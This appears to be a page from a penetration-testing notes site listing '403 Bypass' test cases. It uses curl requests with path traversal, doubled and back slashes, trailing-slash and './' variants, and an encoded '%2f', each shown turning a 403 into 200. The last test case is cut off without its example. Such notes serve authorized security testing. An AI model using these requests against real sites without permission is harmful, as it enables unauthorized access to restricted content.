search

403 Bypass

hashtag
Test case 1: Redirect based Bypass

curl -X GET --path-as-is https://example.com/private/
curl -X GET --path-as-is https://example.com/../admin/

hashtag
Test case 2: Authentication Bypass

/api//users -> 200 OK
/api\users -> 200 OK

hashtag
Test case 3: Directory Based

If you see directory with no slash at end then do these acts there

site.com/secret => 403
site.com/secret/* => 200
site.com/secret/./ => 200

hashtag
Test case 4: File Base

If you see file without any slash at end then do these acts there

site.com/secret.txt => 403
site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200

hashtag
Test case 5: Protocol Base

Well, sound wired but check out the example for better understanding

PreviousTechniquesNextAuth Bypass Headers

Last updated